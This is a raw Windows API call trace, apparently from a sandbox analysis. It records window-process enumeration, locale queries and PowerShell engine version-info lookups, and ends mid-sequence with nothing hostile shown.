	[0942.534] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1664
	[0942.534] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x10b4
	[0942.534] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x10ac
	[0942.534] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x10ec
	[0942.535] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1068
	[0942.535] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x17e0
	[0942.535] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x102c
	[0942.535] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x17a4
	[0942.535] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1050
	[0942.535] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1694
	[0942.535] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1770
	[0942.535] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1720
	[0942.535] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x165c
	[0942.535] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1578
	[0942.535] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x16c0
	[0942.536] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x161c
	[0942.536] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1638
	[0942.536] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x15c8
	[0942.536] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1554
	[0942.536] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1674
	[0942.536] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1520
	[0942.536] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x14bc
	[0942.536] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xf8c
	[0942.536] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xe9c
	[0942.536] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1434
	[0942.537] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x14ec
	[0942.537] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xfcc
	[0942.537] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x12ac
	[0942.537] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1484
	[0942.537] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x934
	[0942.537] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xc0c
	[0942.537] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xb08
	[0942.537] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x948
	[0942.537] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1178
	[0942.537] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x13e0
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xcd0
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x13fc
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xdc8
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xc18
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xc2c
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xa1c
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1244
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xdb0
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1398
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1358
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1370
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1340
	[0942.538] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x130c
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x12c0
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x12e4
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1270
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1298
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x120c
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x122c
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x11c4
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x11b0
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1188
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1148
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1160
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x10fc
	[0942.539] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xe34
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xea4
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x514
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xe48
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xbc8
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xdf8
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x318
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xcac
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x8bc
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xf9c
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xf48
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xe40
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xecc
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xeb8
	[0942.540] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xe80
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xe98
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xe60
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xee4
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xf00
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xdf0
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xe1c
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xdd0
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xd94
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xd74
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xd00
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xcd8
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xc84
	[0942.541] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xca4
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xc64
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xc24
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xb84
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xbac
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x384
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xab8
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x33c
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xa44
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xa64
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x8a8
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xaf0
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x88c
	[0942.542] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xb04
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x910
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x230
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xac0
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xab4
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xaac
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x3d0
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x978
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xa7c
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x59c
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xa88
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xa6c
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xa68
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x9f8
	[0942.543] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xa04
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x924
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x8dc
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x7dc
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x768
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x764
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x820
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x810
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x794
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x83c
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x7ac
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xb44
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x6bc
	[0942.544] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xb5c
	[0942.545] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x838
	[0942.545] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.545] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.545] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.545] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.545] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.545] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.545] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.545] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.545] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x818
	[0942.546] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x5b8
	[0942.546] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x494
	[0942.546] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1ec
	[0942.546] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x440
	[0942.546] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x7e8
	[0942.546] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x730
	[0942.546] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x2c8
	[0942.546] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x31c
	[0942.549] WerSetFlags () returned 0x0
	[0942.837] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0942.837] CoTaskMemFree (pv=0x0) 
	[0942.838] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedea8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedea0 | out: pulNumLanguages=0xedea8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedea0) returned 1
	[0942.838] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedea8, pwszLanguagesBuffer=0x2e8f1d8, pcchLanguagesBuffer=0xedea0 | out: pulNumLanguages=0xedea8, pwszLanguagesBuffer=0x2e8f1d8, pcchLanguagesBuffer=0xedea0) returned 1
	[0942.842] CoTaskMemAlloc (cb=0x24) returned 0x3646b0
	[0942.842] GetUserDefaultLocaleName (in: lpLocaleName=0x3646b0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0942.842] CoTaskMemFree (pv=0x3646b0) 
	[0943.433] CoTaskMemAlloc (cb=0x104) returned 0x366e70
	[0943.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x366e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.433] CoTaskMemFree (pv=0x366e70) 
	[0943.435] CoTaskMemAlloc (cb=0x104) returned 0x366e70
	[0943.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x366e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.435] CoTaskMemFree (pv=0x366e70) 
	[0943.437] CoTaskMemAlloc (cb=0x104) returned 0x366e70
	[0943.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x366e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.437] CoTaskMemFree (pv=0x366e70) 
	[0943.448] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xedd90 | out: lpdwHandle=0xedd90) returned 0x94c
	[0943.449] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e92a68 | out: lpData=0x2e92a68) returned 1
	[0943.451] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedd08, puLen=0xedd00 | out: lplpBuffer=0xedd08*=0x2e92b04, puLen=0xedd00) returned 1
	[0943.451] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x2e92be0, puLen=0xedc70) returned 1
	[0943.451] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0943.451] CoTaskMemAlloc (cb=0x2e) returned 0x35f420
	[0943.451] lstrcpyW (in: lpString1=0x35f420, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0943.451] CoTaskMemFree (pv=0x35f420) 
	[0943.451] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x2e92c34, puLen=0xedc70) returned 1
	[0943.451] lstrlenW (lpString="System.Management.Automation") returned 28
	[0943.451] CoTaskMemAlloc (cb=0x3c) returned 0x2d3f70
	[0943.451] lstrcpyW (in: lpString1=0x2d3f70, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0943.451] CoTaskMemFree (pv=0x2d3f70) 
	[0943.451] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x2e92c90, puLen=0xedc70) returned 1
	[0943.451] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0943.451] CoTaskMemAlloc (cb=0x20) returned 0x364710
	[0943.451] lstrcpyW (in: lpString1=0x364710, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0943.451] CoTaskMemFree (pv=0x364710) 
	[0943.451] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x2e92cd0, puLen=0xedc70) returned 1
	[0943.451] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0943.452] CoTaskMemAlloc (cb=0x44) returned 0x2d3f70
	[0943.452] lstrcpyW (in: lpString1=0x2d3f70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0943.452] CoTaskMemFree (pv=0x2d3f70) 
	[0943.452] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x2e92d38, puLen=0xedc70) returned 1
	[0943.452] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0943.452] CoTaskMemAlloc (cb=0x76) returned 0x2ff100
	[0943.452] lstrcpyW (in: lpString1=0x2ff100, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0943.452] CoTaskMemFree (pv=0x2ff100) 
	[0943.452] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x2e92dd4, puLen=0xedc70) returned 1
	[0943.452] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0943.452] CoTaskMemAlloc (cb=0x44) returned 0x2d3f70
	[0943.452] lstrcpyW (in: lpString1=0x2d3f70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0943.452] CoTaskMemFree (pv=0x2d3f70) 
	[0943.452] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x2e92e38, puLen=0xedc70) returned 1
	[0943.452] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0943.453] CoTaskMemAlloc (cb=0x58) returned 0x32a5a0
	[0943.453] lstrcpyW (in: lpString1=0x32a5a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0943.453] CoTaskMemFree (pv=0x32a5a0) 
	[0943.453] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x2e92eb4, puLen=0xedc70) returned 1
	[0943.453] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0943.453] CoTaskMemAlloc (cb=0x20) returned 0x364710
	[0943.453] lstrcpyW (in: lpString1=0x364710, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0943.453] CoTaskMemFree (pv=0x364710) 
	[0943.453] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x2e92b5c, puLen=0xedc70) returned 1
	[0943.453] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0943.453] CoTaskMemAlloc (cb=0x66) returned 0x2d1000
